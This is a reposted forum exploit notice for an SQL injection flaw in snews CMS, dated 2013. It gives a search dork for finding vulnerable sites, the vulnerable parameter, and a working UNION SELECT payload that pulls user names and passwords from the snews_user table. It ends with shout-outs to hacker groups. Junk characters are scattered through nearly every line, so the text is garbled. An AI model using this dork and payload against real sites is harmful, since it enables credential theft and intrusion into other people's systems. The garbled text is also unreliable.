标题: CMS snews SQL Injection Vulnerability: g2 W# I( B' g/ O7 j- i
作者: By onestree/ l% ~6 Z: }1 H3 [5 d: F
下载地址 : http://snewscms.com/
5 l. O( t _, R5 I6 [测试平台 : ubuntu 12.10 / win 73 p1 v+ {( e8 U- S, E' |& ~1 n ^
关键词: inurl:"tanyakan pada rumput yang bergoyang"
6 ]- J- G, z% Z! ]/ s2 N, ?/ G; p ( R; G7 [3 w V R4 u8 C- z
& G7 c# f( c! B4 V, d*************************************************************
% l) X# ~' v4 l! p' Q1 A 1 }% G8 ]) Y3 `3 U% j
SQL poc:6 Q3 \& J# o/ z: A+ l
" F3 k* @1 I) O1 w3 m' x8 x
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL], e+ O4 ^/ \4 r1 F8 x" W
+ T+ {. Z# o; E9 F. C
示例0 {" P3 y8 h3 E
9 `. E# a1 q ^: C8 \3 H3 M
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*# t; [4 \/ z$ M6 t; p- x& F
7 }- I" p" f& q
: F; x6 {: `3 @% s致谢:2 ` w8 ^# w# ~4 e* i
R+ u. N# F% z2 h2 ]% l
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell% j( M9 i, L- Z
' e$ p4 C/ N2 N/ x
indonesiancoder - moeslimh4x0r - go-coder
: H/ A: ]- i8 S; x $ g. x3 A* ~3 p R
spesial my hunny :*
~' j# _& s7 ?, u. X0 c7 h* A5 s |
发表于 2013-1-23 08:55:06
收藏
支持
反对